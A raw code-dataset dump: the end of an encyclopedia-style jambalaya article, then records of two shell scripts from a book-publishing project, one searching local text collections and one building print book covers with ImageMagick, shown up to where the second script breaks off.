It is added to the meat and vegetables before serving. This is called \"white jambalaya.\" This dish is rare in Louisiana as it is seen as a \"quick\" attempt to make jambalaya, popularized outside the state to shorten cooking time.\n\nMany people in the south, and typically in Louisiana, enjoy a simpler Jambalaya style. This style is cooked the same as the rural style, but there are no vegetables. Many restaurants serve this style as opposed to the others, because it is more child-friendly, has a more consistent texture, and is easier to make.\n\nJambalaya is considered by most Louisianans to be a filling but simple-to-prepare rice dish; gumbos, étouffées, and creoles are considered more difficult to perfect. Most often a long grain white rice is used in making jambalaya.\n\nJambalaya is differentiated from gumbo and étouffée by the way in which the rice is included. In these dishes, the rice is cooked separately and is served as a bed on which the main dish is served. In the usual method of preparing jambalaya, a rich stock is created from vegetables, meat, and seafood; raw rice is then added to the broth and the flavor is absorbed by the grains as the rice cooks.\n\n\n\n\n\n### History ##\n\n\n\nCreole jambalaya originates from the French Quarter of New Orleans, in the original European sector. It was an attempt by the Spanish to make paella in the New World, where saffron was not readily available due to import costs. Tomatoes became the substitute for saffron. As time went on, French influence became strong in New Orleans, and spices from the Caribbean changed this New World paella into a unique dish. In modern Louisiana, the dish has evolved along a variety of different lines. 
Creole jambalaya, or red jambalaya, is found primarily in and around New Orleans, where it is simply known as 'jambalaya'. City Creole jambalaya includes tomatoes, whereas rural jambalaya does not.\n\nRural Jambalaya originates from Louisiana's rural, low-lying swamp country where crawfish, shrimp, oysters, alligator, duck, turtle, boar, venison, nutria and other game were readily available. Any variety or combination of meats, including chicken or turkey may be used to make jambalaya. Rural jambalaya is known as 'Brown jambalaya' in the New Orleans area; to rural Creoles it is simply known as 'jambalaya.' Rural jambalaya has more of a smoky and spicy flavor than its cousin jambalaya. The French Creoles of couleur introduced jambalaya to the Cajuns.\n\n\n\nThe first appearance in print of any variant of the word 'jambalaya' in any language occurred in Leis amours de Vanus; vo, Lou paysan oou théâtré, by Fortuné (Fortunat) Chailan, first published in Provençal dialect in 1837. The earliest appearance of the word in print in English occurs in the May 1849 issue of the American Agriculturalist, page 161, where Solon Robinson refers to a recipe for 'Hopping Johnny (jambalaya)'. Jambalaya did not appear in a cookbook until 1878, when The Gulf City Cook Book, by the ladies of the St. Francis Street Methodist Episcopal Church, was printed in South Mobile, Alabama. It contains a recipe for \"JAM BOLAYA\".\n\nJambalaya experienced a brief jump in popularity during the 1920s and 1930s because of its flexible recipe. The dish was little more than the rice and vegetables the populace could afford, but the recipe grew from humble roots.\n\nIn 1968, Louisiana Governor John J. McKeithen proclaimed Gonzales, Louisiana, the Jambalaya Capital of the World. Every Spring, the annual Jambalaya Festival is held in Gonzales.\n\n\n\n\n\n### Etymology ##\n\nThe Oxford English Dictionary indicates that 'jambalaya' comes from the Provençal word 'jambalaia', meaning a mish mash, or mixup, and also meaning a pilau (pilaf) of rice. This is supported by the fact that the first printed appearance of the word is in a Provençal poem published in 1837.\n\n\n\nAnother popular source suggests that the word comes from the Spanish 'jamón' (\"ham\") + 'paella', a noted Spanish rice dish. However, the evidence for this idea is also thin. Again, ham is not a featured element of the dish, and Spanish speakers would call a ham paella 'paella con jamón', not 'jamón paella.'\n\nThe Dictionary of American Food and Drink offers this creative old wives' tale about the origin of the word:\n\n\n\nLate one evening a traveling gentleman stopped by a New Orleans inn which had little food remaining from the evening meal. The traveler instructed the cook, \"Jean, balayez!\" or \"Jean, sweep something together!\" in the local dialect. The guest pronounced the resulting hodge-podge dish as \"Jean balayez.\"\n\n\n\nThe Atakapa tribe states the origin of the name. The original word \"Sham, pal ha! Ya!\" means \"Be full, not skinny! Eat Up!\" with a French equivalent of \"Bon appétit!\". 
Spanish influence resulted in the current spelling of the name.\n\n\n\n\n\n### See also ##\n\n\n\nList of regional dishes of the United States\n\nSimilar dishes:\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\nChronology of all early mentions of Jambalaya in print.\n\n \n \n" }, { "alpha_fraction": 0.6945578455924988, "alphanum_fraction": 0.6961451172828674, "avg_line_length": 61.112674713134766, "blob_id": "0be2bc97fe67d168240be4feaa47b89225cf5e6d", "content_id": "dada75ceadc5a5bb4a43883d660450689e455c9c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4410, "license_type": "permissive", "max_line_length": 137, "num_lines": 71, "path": "/scripts/includes/search-content-collections.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"$content_collections\" | sed -e 's/; /;/g' -e 's/;/\\n/g' > \"$TMPDIR$uuid/content_collections/content_collections_list\"\necho -n \"searching the following content collections: \"\ncat \"$TMPDIR$uuid/content_collections/content_collections_list\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\necho \"# Local Data\" > \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \"searches carried out at $(date -u)\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\nwhile IFS= read -r collection; do\n mkdir \"$TMPDIR$uuid/content_collections/$collection\"\n . \"$LOCAL_DATA\"content_collections/\"$collection/$collection.cfg\"\n\n echo \"# $content_collection_name\" > \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\n while IFS= read -r seed; do\n echo \"now searching $collection on $seed\"\n echo \"## **\"$seed\"**\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\n case $content_collection_filetype in\n pdf)\n echo \"ccf filetype is pdf\"\n grep -h -r -l -w \"$seed\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" | while read fn\n do\n #echo \"**$fn**\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n #echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n #pdfgrep \"$seed\" -r -h -C 120 \"$fn\" | uniq | sed G >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n #echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"pdfgrep search not implemented in search-content-collections\"\n done\n ;;\n txt)\n echo \"using grep against txt files in collection\"\n echo $content_collection_dirname\n grep -h -r -l -w \"$seed\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" >> \"$TMPDIR$uuid/content_collections/files\"\n grep -r -l \"$seed\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" | while read fn\n do\n echo \"*$fn*\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> 
\"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n grep \"$seed\" --no-group-separator -h -w -A 2 -B 2 \"$fn\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n done\n ;;\n *)\n echo \"assuming files in collection are txt and running grep\"\n grep -h -r -l -w \"$seed\" \"$fn\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" | while read fn\n do\n echo \"**$fn**\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n grep \"$seed\" --no-group-separator -hw -A 2 -B 2 \"$fn\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n done\n ;;\n esac\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\n done < \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\"\n\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n sed -i 's/----//g' \"$TMPDIR$uuid/content_collections/content_collections_results.md\" #hack to remove confusing markdown from gutenberg\n sed -i 's/<<<//g' \"$TMPDIR$uuid/content_collections/content_collections_results.md\" #hack to remove confusing markdown from gutenberg\n echo \"$content_collection_citation\" >> \"$TMPDIR$uuid/content_collections/content_sources.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_sources.md\"\ndone < \"$TMPDIR$uuid/content_collections/content_collections_list\"\n" }, { "alpha_fraction": 0.6875585913658142, "alphanum_fraction": 0.7069689631462097, "avg_line_length": 30.886865615844727, "blob_id": "1d1f5f25dde84344115280d2b306deeaa525824d", "content_id": "da5488948cb7ad1250e0a4e655aef2002e4c0b94", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 24523, "license_type": "permissive", "max_line_length": 354, "num_lines": 769, "path": "/scripts/standalone-print.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. 
../conf/config.txt\n\nuuid=$(python -c 'import uuid; print uuid.uuid1()')\necho \"stand-alone uuid for this instance is\" $uuid | tee --append $sfb_log\n\n# echo \"launched standalone print\" | tee --append /opt/bitnami/apache2/htdocs/pk-new/development/scripts/success # debugging command\n\n# command line parser\n\n# process command line\n\n#!/bin/sh\n# (POSIX shell syntax)\n\n# Reset all variables that might be set\n\n# this is for case bound only - most of these values would need to be conditional to support other bindings\n\n\tprint_horizontal_trim=1538 # 2438 8.125 inches for 8.5 inch books \n\tprint_vertical_trim=2550 # 3300 for 11 inch\n\tprint_top_height=$((print_vertical_trim / 4 - 50))\n\tprint_bottom_height=$((print_vertical_trim / 10))\n\tprint_label_text_width=$((print_horizontal_trim - 225))\n\tbottom_label_top_edge=$((print_vertical_trim - print_bottom_height - print_bottom_height))\n\toutsidebleed=187\n\tinsidebleed=204\n\ttopbleed=217\n\tbottombleed=225\n\ttextsafety=150\n\tcovercolor=`shuf -n 1 ../conf/print-cover-colors.txt`\n\tcoverfontcolor=\"White\"\n\tcoverfont=`shuf -n 1 ../conf/print-cover-fonts.txt`\n\tcovertype=\"wordcloud\"\n\timprintname=\"PageKicker\"\n\timprintlogo=\"assets/purplebird300.png\"\n\nwhile :\ndo\n case $1 in\n -h | --help | -\\?)\n \t# Call your Help() or usage() function here.\n \t exit 0 # This is not an error, User asked help. Don't do \"exit 1\"\n \t;;\n -I | --ISBN)\n \t userprovidedprintISBN=$2 # You might want to check if you really got FILE\n \t shift 2\n \t ;;\n --ISBN=*)\n \t userprovidedprintISBN=${1#*=} # Delete everything up till \"=\"\n \tshift\n \t ;;\n\t-t | --covertitle)\n\t\tcovertitle=$2\n\t\tshift 2\n\t\t;;\n\t--covertitle=*)\n\t\tcovertitle=${1#*=}\n\t\tshift\n\t\t;;\n\t-T | --shorttitle)\n\t\tshorttitle=$2\n\t\tshift 2\n\t\t;;\n\t--shorttitle=*)\n\t\tshorttitle=${1#*=}\n\t\tshift\n\t\t;;\n\t-e | --editedby)\n\t\teditedby=$2\n\t\tshift 2\n\t\t;;\n\t--editedby=*)\n\t\teditedby=${1#*=}\n\t\tshift\n\t\t;;\n\t-s | --spinepixels)\n\t\tspinepixels=$2\n\t\tshift 2\n\t\t;;\n\t--spinepixels=*)\n\t\tspinepixels=${1#*=}\n\t\techo $spinepixels\n\t\tspinepixels=$(( spinepixels )) # force arithmetic evaluation to an integer\n\t\techo $spinepixels\n\t\tshift\n\t\t;;\n\t-p | --pdfpath)\n\t\tpdfpath=$2\n\t\tshift 2\n\t\t;;\n\t--pdfpath=*)\n\t\tpdfpath=${1#*=}\n\t\tshift\n\t\t;;\n\t-c | --covercolor)\n\t\tcovercolor=$2\n\t\tshift 2\n\t\t;;\n\t--covercolor=*)\n\t\tcovercolor=${1#*=}\n\t\tshift\n\t\t;;\n\t-f | --coverfont)\n\t\tcoverfont=$2\n\t\tshift 2\n\t\t;;\n\t--coverfont=*)\n\t\tcoverfont=${1#*=}\n\t\tshift\n\t\t;;\n\t--covertype) # -T is already taken by --shorttitle above\n\t\tcovertype=$2\n\t\tshift 2\n\t\t;;\n\t--covertype=*)\n\t\tcovertype=${1#*=}\n\t\tshift\n\t\t;;\n\t--userimage)\n\t\tuserimage=$2\n\t\tshift 2\n\t\t;;\n\t--userimage=*)\n\t\tuserimage=${1#*=}\n\t\tshift\n\t\t;;\n\t--usercaption)\n\t\tusercaption=$2\n\t\tshift 2\n\t\t;;\n\t--usercaption=*)\n\t\tusercaption=${1#*=}\n\t\tshift\n\t\t;;\n\t--imprintname)\n\t\timprintname=$2\n\t\tshift 2\n\t\t;;\n\t--imprintname=*)\n\t\timprintname=${1#*=}\n\t\tshift\n\t\t;;\n\t--spineinches)\n\t\tspineinches=$2\n\t\tshift 2\n\t\t;;\n\t--spineinches=*)\n\t\tspineinches=${1#*=}\n\t\tshift\n\t\t;;\n\t--print_vertical_trim)\n\t\tprint_vertical_trim=$2\n\t\tshift 2\n\t\t;;\n\t--print_vertical_trim=*)\n\t\tprint_vertical_trim=${1#*=}\n\t\tshift\n\t\t;;\n\t--print_horizontal_trim)\n\t\tprint_horizontal_trim=$2\n\t\tshift 2\n\t\t;;\n\t--print_horizontal_trim=*)\n\t\tprint_horizontal_trim=${1#*=}\n\t\tshift\n\t\t;;\n\t--coverfontcolor)\n\t\tcoverfontcolor=$2\n\t\tshift 2\n\t\t;;\n\t--coverfontcolor=*)\n\t\tcoverfontcolor=${1#*=}\n\t\tshift\n\t\t;;\n\t--pdfx1a)\n\t\tpdfx1a=$2\n\t\tshift 2\n\t\t;;\n\t--pdfx1a=*)\n\t\tpdfx1a=${1#*=}\n\t\tshift\n\t\t;;\n --trimsize)\n\t\ttrimsize=$2\n\t\tshift 2\n\t\t;;\n\t--trimsize=*)\n\t\ttrimsize=${1#*=}\n\t\tshift\n\t\t;;\n --customer_email)\n customer_email=$2\n shift 2\n ;;\n --customer_email=*)\n customer_email=${1#*=}\n shift\n ;;\n\t--pass_uuid)\n\t\tpass_uuid=$2\n\t\tshift 2\n\t\t;;\n\t--pass_uuid=*)\n\t\tpass_uuid=${1#*=}\n\t\tshift\n\t\t;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n esac\ndone\n\nsku=\"sku\"\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$userprovidedprintISBN\" ]; then\n echo \"ERROR: option '--ISBN [isbnvalue]' not given. See --help\" >&2\n exit 1\nfi\n\n\n\necho \"imprint name\" $imprintname\n\nif [ \"$covercolor\" = \"Random\" ] ; then\n\n covercolor=`shuf -n 1 ../conf/print-cover-colors.txt`\n coverfontcolor=\"White\"\n echo \"Random cover color is \" $covercolor\n\nelse\n\n echo \"covercolor is unchanged as\" $covercolor\n\nfi\n\nif [ \"$coverfont\" = \"Random\" ] ; then\n\n coverfont=`shuf -n 1 ../conf/print-cover-fonts.txt`\n echo \"Random cover font is \" $coverfont\nelse\n echo \"coverfont is unchanged as\" $coverfont\n\nfi\n\nspinefloat=$(echo \"300*$spineinches\" |bc); echo \"spine width in floating point pixels is\" $spinefloat; spinepixels=${spinefloat/.*}; echo \"spine width in integer pixels is \" $spinepixels\n\n\necho \"accepted userprovidedprintISBN from command line and it is \" $userprovidedprintISBN\necho \"accepted covertitle from command line and it is \" $covertitle\necho \"accepted shorttitle from command line and it is \" $shorttitle\necho \"accepted editedby from command line and it is \" $editedby\necho \"accepted spine pixels or spineinches from command line and result is \" $spinepixels\necho \"accepted path to pdf of interior and it is \" $pdfpath\necho \"accepted covertype and it is\" $covertype\necho \"accepted user image path and it is\" $userimage\necho \"accepted user caption and it is\" $usercaption\necho \"accepted trim size and it is\" $trimsize\necho \"accepted customer email and it is\" $customer_email\necho \"accepted uuid from command line and it is\" $pass_uuid\nuuid=$pass_uuid\necho \"accordingly uuid for this instance is now\" $uuid\n\n\n# echo making directories as needed\n\n
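# Example invocation (illustrative only: the flag names are the ones parsed above,\n# while the ISBN, paths, and values are hypothetical):\n#\n#   ./standalone-print.sh --ISBN 9781234567897 --covertitle \"Paella\" \\\n#     --shorttitle \"Paella\" --editedby \"Jane Doe\" --spineinches 0.25 \\\n#     --pdfpath tmp/interior.pdf --trimsize 5.5x8.5 --covertype wordcloud\n\nif [ ! 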
$(ls -A images/$uuid) ] ; then\n\tmkdir -p images/$uuid ; mkdir -p images/$uuid/print\nelse\n\techo \"uuid directories were already made by xform\"\nfi\n\n# need to protect SQL from apostrophes in \n\n#$LOCAL_MYSQL_PATH --user $LOCAL_MYSQL_USER --password=$LOCAL_MYSQL_PASSWORD sfb-jobs << EOF\n#insert into standalone_print_cover_builds (ISBN, covertitle, shorttitle, editedby, spinepixels, covercolor, coverfontcolor, coverfont, uuid) values('$userprovidedprintISBN', '$covertitle', '$shorttitle', '$editedby', '$spinepixels', '$covercolor', '$coverfontcolor', '$coverfont', '$uuid');\n#EOF\n\n\n# calculate dimensions\n\ncase $trimsize in\n\n5.5x8.5)\n\n print_horizontal_trim=1538 # 2438 8.125 inches for 8.5 inch books \n\tprint_vertical_trim=2550 # 3300 for 11 inch\n ;;\n\n8.5x11)\n print_horizontal_trim=2438 # 8.125 inches for 8.5 inch books \n\tprint_vertical_trim=3300 # for 11 inch\n bottom_label_top_edge=$((print_vertical_trim - print_bottom_height - 175))\n ;;\n*)\n echo \"invalid trimsize\" \n exit 0\n;;\nesac\n\n\t# calculate spine dimensions (we must know the spine before we can do the canvas!)\n\n\t\techo \"checking sku is \" $sku \"and path to pdf is \" $pdfpath\n\n\t\tpdfpagecount=`pdftk \"$pdfpath\" dump_data output | grep -i NumberOfPages | cut -d\":\" -f2 | sed '/^$/d'`\n\n\t\techo \"pdf page count is\" $pdfpagecount\n\n\t\t# get rid of space and save $spinepixels as variable\n\n\t\t# BUT THIS ASSUMES THAT OCR LAYER IS EMBEDDED IN PDR\n\n\t# calculate size of canvas\n\n\t\tcanvaswidth=$(( $print_horizontal_trim * 2 + $spinepixels + $outsidebleed + $insidebleed + $insidebleed + $outsidebleed + 49 ))\n\t\tcanvasheight=$(( $topbleed + $print_vertical_trim + $bottombleed + 10 ))\n\n\t\techo \"calculated canvaswidth as \"$canvaswidth\n\t\techo \"calculated canvasheight as \"$canvasheight\n\n\t# calculate safe areas on front and back page\n\n\t\tsafepagewidth=$(( $print_horizontal_trim - $textsafety - $textsafety ))\n\t\tsafepageheight=$(( $print_vertical_trim - $textsafety ))\n\n\t\techo \"calculated safepagewidth as\" $safepagewidth\n\t\techo \"calculated safepageheight as\" $safepageheight\n\n\t# calculate word cloud size\n\n\t\twordcloudwidth=$(( $print_horizontal_trim - 150))\n\t\twordcloudheight=$(( $safepageheight- $print_bottom_height - $print_top_height ))\n\t\techo \"calculated wordcloudwidth\" as $wordcloudwidth \"and wordcloudheight\" as $wordcloudheight\n\n\t# calculate spine\n\n\t\tif [ \"$spinepixels\" -lt 106 ] ; then\n\t\t\tspinesafety=19\n\t\t\techo \"because spine width is less than 106 pixels, spinesafety is \" $spinesafety \"and we are using the short title for the spine\"\n\t\t\t\n\t\telse\n\t\t\tspinesafety=37\n\t\t\techo \"because spine width is greater than 105 pixels, spinesafety is \" $spinesafety\n\t\tfi\n\n\t\n\n\t\tsafespinetitlewidth=$(( $spinepixels - $spinesafety - $spinesafety ))\n\n\t\techo \"safespinetitlewidth is\" $safespinetitlewidth\n\n\t\tsafespinetitleheight=$(( $safepageheight * 2 ))\n\n\t\techo \"calculated safespinetitleheight as \" $safespinetitleheight\n\n\t\tspineleftmargin=$(( $outsidebleed + $insidebleed + $print_horizontal_trim -18 + $spinesafety * 2))\n\n\t\techo \"calculated spineleftmargin as bleed + page width + spinepixels for \" $spineleftmargin\n\t\t\n\t\n\n\t# front page calculations\n\n\t\tfrontpageflushleftmargin=$(( $outsidebleed + $print_horizontal_trim + $insidebleed + $spinepixels + insidebleed - 8 ))\n\n\t\techo \"calculated frontpageflushleftmargin as\" $frontpageflushleftmargin\n\n\t\t# there's always a cushion around 
top and bottom text \n\n\t\tfrontpagetopcushion=150\n\n\t\tfrontpagebottomcushion=0\n\n\t\techo \"frontpagetopcushion is \" $frontpagetopcushion\n\t\techo \"frontpagebottomcushion is \" $frontpagebottomcushion\n\n\t# back page calculations\n\n\t\tISBNylocation=$(( $safepageheight - 300 - 25 ))\n\t\tISBNxlocation=$(( $outsidebleed + 125 ))\n\n\t\techo \"calculated ISBNxlocation as\" $ISBNxlocation\n\t\techo \"calculated ISBNylocation as\" $ISBNylocation\n\n\t\tbackpagetopcushion=$frontpagetopcushion\n\t\tbackpagebottomcushion=$frontpagebottomcushion\n\n\t\techo \"backpage top and bottom cushions are\" $backpagetopcushion \"and\" $backpagebottomcushion\n\n\t\tbackpageleftbleedbegins=$(($outsidebleed))\n\t\tbackpagelefttextbegins=$(($backpageleftbleedbegins + $textsafety))\n\t\n\t\techo \"backpage left bleed and left text margin are\" $backpageleftbleedbegins \"and\" $backpagelefttextbegins\n\n\n\t# start by building the full canvas\n\n\t\tconvert -size \"$canvaswidth\"x\"$canvasheight\" xc:$covercolor \\\n\t\t-units \"PixelsPerInch\" -density 300 -resample 300x \\\n\t\timages/$uuid/print/fullcanvas.png\n\n\n\t# then create the front cover\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_vertical_trim\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/canvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/topcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/bottomcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/toplabel.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/bottomlabel.png\n\n\n\tcase $covertype in\n\n\n\twordcloud)\n\n\t\tpdftotext \"$pdfpath\" images/$uuid/print/wordcloud.txt\n\n\t\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w $wordcloudwidth -h $wordcloudheight < images/$uuid/print/wordcloud.txt > images/$uuid/print/\"printcloud.png\" 2> /dev/null\n\n\t\t# building WordCloud \"PK Peek\" \n\n\t\tpeekthroughwidth=$(( wordcloudwidth / 3 + 25))\n\n\t\tconvert -size \"$peekthroughwidth\"x100 -density 300 -border 1 -bordercolor \"white\" -units pixelsperinch -background $covercolor -fill \"$coverfontcolor\" \\\n\t\t-font \"$coverfont\" -gravity center -pointsize 11 caption:\"Peekthrough by PageKicker\" images/$uuid/print/peekthrough.png \n\t\tconvert images/$uuid/print/peekthrough.png images/$uuid/print/\"printcloud.png\" -append images/$uuid/print/\"peekprintcloud.png\"\n\n\t\t# overlay the Word Cloud cover \n\n\t\tcomposite -gravity Center images/$uuid/print/\"peekprintcloud.png\" images/$uuid/print/canvas.png images/$uuid/print/canvastest.png\n\n\t;;\n\n\timagefrontcenter) \n\t\t\n\t\tconvert \"$userimage\" -resize \"$wordcloudwidth\"x\"$wordcloudheight\" images/$uuid/print/resizedimage.tif\n\t\tconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -size \"$wordcloudwidth\"x200 -pointsize \"14\" caption:\"$usercaption\" -gravity \"north\" images/$uuid/print/usercaption.png\n\t\tconvert images/$uuid/print/resizedimage.tif images/$uuid/print/usercaption.png -append images/$uuid/print/resizedimagewithcaption.tif\n\t\tcomposite -gravity Center images/$uuid/print/resizedimagewithcaption.tif 
images/$uuid/print/canvas.png images/$uuid/print/canvastest.png\n\n\t;;\n\n\t*)\n\n\tesac\n\n\t# build the labels for the front cover\n\n\techo \"covertitle is\" $covertitle\n\n\tconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity center -size \"$print_label_text_width\"x\"$print_top_height\" \\\n\t\t\t-font \"$coverfont\" caption:\"$covertitle\" \\\n\t\t\t-density 300 -units pixelsperinch\\\n\t\t\t\t images/$uuid/print/topcanvas.png +swap -gravity center -composite images/$uuid/print/toplabel.png\n\n\techo \"print_label_text_width is\" $print_label_text_width \"and height is\" $print_top_height\n\n\tconvert -background $covercolor -fill \"$coverfontcolor\" -gravity center -border 20x20 -bordercolor \"$covercolor\" -size \"$print_label_text_width\"x\"$print_bottom_height\" \\\n\t\t -font \"$coverfont\" caption:\"$editedby\" \\\n\t\t-density 300 -units pixelsperinch\\\n\t\t images/$uuid/print/bottomcanvas.png +swap -gravity center -composite images/$uuid/print/bottomlabel.png\n\n\t# lay the labels on top of the front cover\n\t\tcomposite -geometry +0+150 images/$uuid/print/toplabel.png images/$uuid/print/canvastest.png images/$uuid/print/step1.png\n\t\tbottom_label_top_edge=$((bottom_label_top_edge - 150))\n\t\tcomposite -geometry +0+$bottom_label_top_edge images/$uuid/print/bottomlabel.png images/$uuid/print/step1.png images/$uuid/print/step2.png\n\n\t\tcase \"$imprintname\" in\n\t\tPageKicker)\n\t\tcomposite -gravity south -geometry +0+0 assets/PageKicker_cmyk300dpi_300.png images/$uuid/print/step2.png images/$uuid/print/cover.png\n\t\t;;\n\t\t*)\n\t\tconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -size \"$wordcloudwidth\"x\"300\" -font \"$coverfont\" caption:\"$imprintname\" images/$uuid/print/imprintname.png\n\t\tcomposite -gravity south -geometry +0+0 images/$uuid/print/imprintname.png images/$uuid/print/step2.png images/$uuid/print/cover.png\n\t\t;;\n\t\tesac\n\n\t# make a working copy of the front cover\n\n\t\tcp images/$uuid/print/cover.png images/$uuid/print/$sku\"printfrontcover.png\"\n\n\t# make PDF and EPS copies of the front cover\n\t\tconvert images/$uuid/print/$sku\"printfrontcover.png\" -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\"\n\t\tconvert -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\" images/$uuid/print/$sku\"printfrontcover.eps\"\n\n\t# build the ISBN\n\t\n\tpython $scriptpath\"lib/bookland-1.4/bookland-1.4.1b\" -o images/$uuid/print/$userprovidedprintISBN.eps -f OCRB -b 1 -n -q --cmyk 0,0,0,1.0 \"$userprovidedprintISBN\" 90000\n\n # need to get rid of following sudo - it is ghostscript/imagemagick problem\n\n\tsudo convert -units \"PixelsPerInch\" -density 1200 -resize 25% -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.eps -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.png\n\tconvert images/$uuid/print/$userprovidedprintISBN.png -colorspace CMYK -background white -flatten images/$uuid/print/$userprovidedprintISBN\"box.png\"\n\n\t# build the spine caption\n\n\techo \"building spine caption\"\n\n\tconvert -size \"$safespinetitleheight\"x\"$safespinetitlewidth\" -density 300 -units pixelsperinch -background $covercolor -pointsize \"11\" -fill \"$coverfontcolor\" -font \"$coverfont\" \\\n\t-rotate 90 -gravity west caption:\"$shorttitle\" images/$uuid/print/spinecaption.png\n\n\t# build the spine logotype\n\n\tlogotypeheight=$(( safespinetitleheight / 6))\n\techo \"calculated logotypeheight as\" $logotypeheight\n\n\tconvert -size \"$logotypeheight\"x\"$safespinetitlewidth\" -density 300 
-units pixelsperinch -background \"$covercolor\" -fill \"$coverfontcolor\" \\\n\t-font \"$coverfont\" -rotate 90 -gravity East -pointsize \"11\" caption:\"$imprintname\" images/$uuid/print/spinelogotype.png\n\n\n# lay the objects on the canvas\n \n\n\t# lay the front cover on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas.png \\\n\t\timages/$uuid/print/$sku\"printfrontcover.png\" -geometry +$frontpageflushleftmargin+$topbleed -composite \\\n\t\timages/$uuid/print/fullcanvas2.png\n\n# assemble and lay down the spine caption and logotype, unless it is too thin\n\n\tif [ \"$pdfpagecount\" -lt 48 ]; then\n\n\t\techo \"page count too low for spine\"\n\t\tcp images/$uuid/print/fullcanvas2.png images/$uuid/print/finalcanvas.png\n cp images/$uuid/print/fullcanvas2.png images/$uuid/print/fullcanvas4.png\n\n\telse\n\n\t\t# lay the spine caption on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas2.png \\\n\t\timages/$uuid/print/spinecaption.png -geometry +$spineleftmargin+375 -composite \\\n\t\timages/$uuid/print/fullcanvas3.png\n\n\n\t\t# resize the purple bird \n\t\tpurplebirdsize=75\n\t\tconvert \"$imprintlogo\" -resize $purplebirdsizex$purplebirdsize\\> images/$uuid/print/purple$safespinetitlewidth.png\n\n\t\t# surround the bird with a white box\n\n\t\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 5x5 -bordercolor white images/$uuid/print/purple$safespinetitlewidth.png -colorspace CMYK images/$uuid/print/purplebirdwithbox.png\n\n\t\t# create spacer box\n\n\t\tconvert -size \"$safespinetitlewidth\"x20 xc:none images/$uuid/print/spacer.png\n\n\t\t# append spine logotype, spacer, and purplebird box\n\n\t\tconvert images/$uuid/print/spinelogotype.png images/$uuid/print/spacer.png -background none -gravity west -append images/$uuid/print/logowithspacer.png\n\n\t\t\tif [[ \"$spinepixels\" -gt 144 ]] ; then \n\n\t\t\tconvert images/$uuid/print/logowithspacer.png images/$uuid/print/purplebirdwithbox.png -background none -gravity center -append images/$uuid/print/logobar.png\n\n\t\t\telse \n\n\t\t\tcp images/$uuid/print/logowithspacer.png images/$uuid/print/logobar.png\n\n\t\t\tfi\n\n\t\t# 